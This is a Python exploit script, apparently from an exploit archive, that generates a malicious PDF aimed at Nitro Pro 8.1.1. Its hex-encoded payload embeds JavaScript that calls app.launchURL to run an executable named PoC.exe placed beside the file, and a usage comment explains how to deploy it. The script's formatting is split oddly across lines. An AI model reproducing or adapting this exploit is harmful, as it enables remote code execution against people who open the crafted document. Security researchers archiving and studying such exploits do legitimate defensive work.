#!\usr\bin\env python
# Exploit Title: Nitro Pro Remote Code Execution Exploit
# Date: 2013/03/15
# Exploit Author: Mr.XHat
# Discovered By: Mr.XHat
# Vendor Homepage: http://www.nitropdf.com/
# Software Link: http://www.rodfile.com/8178ciy92vu7
# Version: 8.1.1 Build 12
# Tested On: WinXP SP3 EN, Win7 SP1 EN
# How To Use: Put Your "*.exe" File Side The Exploit.pdf File.
Code
=
(
"\x25\x50\x44\x46\x2D\x31\x2E\x37\x0D\x25\xE2\xE3\xCF\xD3"
+
"\x0D\x0A\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F"
+
"\x54\x79\x70\x65\x20\x2F\x43\x61\x74\x61\x6C\x6F\x67\x0D"
+
"\x0A\x2F\x4F\x75\x74\x6C\x69\x6E\x65\x73\x20\x35\x20\x30"
+
"\x20\x52\x0D\x0A\x2F\x50\x61\x67\x65\x73\x20\x34\x20\x30"
+
"\x20\x52\x0D\x0A\x2F\x41\x41\x20\x3C\x3C\x2F\x57\x43\x20"
+
"\x3C\x3C\x2F\x53\x20\x2F\x4A\x61\x76\x61\x53\x63\x72\x69"
+
"\x70\x74\x0D\x0A\x2F\x4A\x53\x20\x28\x78\x20\x3D\x20\x22"
+
"\x50\x6f\x43\x2e\x65\x78\x65"
+
# PoC.exe
"\x22\x3B\x20\x61\x70\x70\x2E\x6C\x61\x75\x6E\x63\x68\x55"
+
"\x52\x4C\x5C\x28\x78\x2C\x20\x74\x72\x75\x65\x5C\x29\x3B"
+
"\x29\x0D\x0A\x3E\x3E\x0D\x0A\x3E\x3E\x0D\x0A\x3E\x3E\x0D"
+
"\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x20\x30\x20\x6F"
+
"\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x6F\x64\x44\x61\x74\x65"
+
"\x20\x28\x44\x3A\x32\x30\x31\x33\x30\x33\x31\x35\x31\x32"
+
"\x35\x31\x31\x30\x2B\x30\x34\x27\x33\x30\x27\x29\x0D\x0A"
+
"\x2F\x43\x72\x65\x61\x74\x6F\x72\x20\x28\x4E\x69\x74\x72"
+
"\x6F\x20\x50\x72\x6F\x20\x38\x29\x0D\x0A\x3E\x3E\x0D\x0A"
+
"\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62"
+
"\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x20\x2F\x50\x61"
+
"\x67\x65\x0D\x0A\x2F\x50\x61\x72\x65\x6E\x74\x20\x34\x20"
+
"\x30\x20\x52\x0D\x0A\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78"
+
"\x20\x5B\x30\x2E\x30\x30\x30\x30\x20\x37\x39\x32\x2E\x30"
+
"\x30\x30\x30\x20\x36\x31\x32\x2E\x30\x30\x30\x30\x20\x30"
+
"\x2E\x30\x30\x30\x30\x5D\x0D\x0A\x3E\x3E\x0D\x0A\x65\x6E"
+
"\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D"
+
"\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x20\x2F\x50\x61\x67\x65"
+
"\x73\x0D\x0A\x2F\x43\x6F\x75\x6E\x74\x20\x31\x0D\x0A\x2F"
+
"\x4B\x69\x64\x73\x20\x5B\x33\x20\x30\x20\x52\x5D\x0D\x0A"
+
"\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20"
+
"\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65"
+
"\x20\x2F\x4F\x75\x74\x6C\x69\x6E\x65\x73\x0D\x0A\x2F\x43"
+
"\x6F\x75\x6E\x74\x20\x30\x0D\x0A\x3E\x3E\x0D\x0A\x65\x6E"
+
"\x64\x6F\x62\x6A\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x30\x20"
+
"\x36\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20"
+
"\x36\x35\x35\x33\x35\x20\x66\x0D\x0A\x30\x30\x30\x30\x30"
+
"\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D"
+
"\x0A\x30\x30\x30\x30\x30\x30\x30\x31\x37\x36\x20\x30\x30"
+
"\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30"
+
"\x32\x35\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30"
+
"\x30\x30\x30\x30\x30\x30\x33\x35\x35\x20\x30\x30\x30\x30"
+
"\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x31"
+
"\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61"
+
"\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F\x6F\x74\x20"
+
"\x31\x20\x30\x20\x52\x0D\x0A\x2F\x49\x6E\x66\x6F\x20\x32"
+
"\x20\x30\x20\x52\x0D\x0A\x2F\x53\x69\x7A\x65\x20\x36\x0D"
+
"\x0A\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66"
+
"\x0D\x0A\x34\x36\x37\x0D\x0A\x25\x25\x45\x4F\x46\x0D\x0A"
)
try
:
File
=
open
(
"Exploit.pdf"
,
"w"
)
File
.write(Code)
File
.close()
print
"\nFile Created Successfully!"
except
:
print
"\nTry Again!"
# END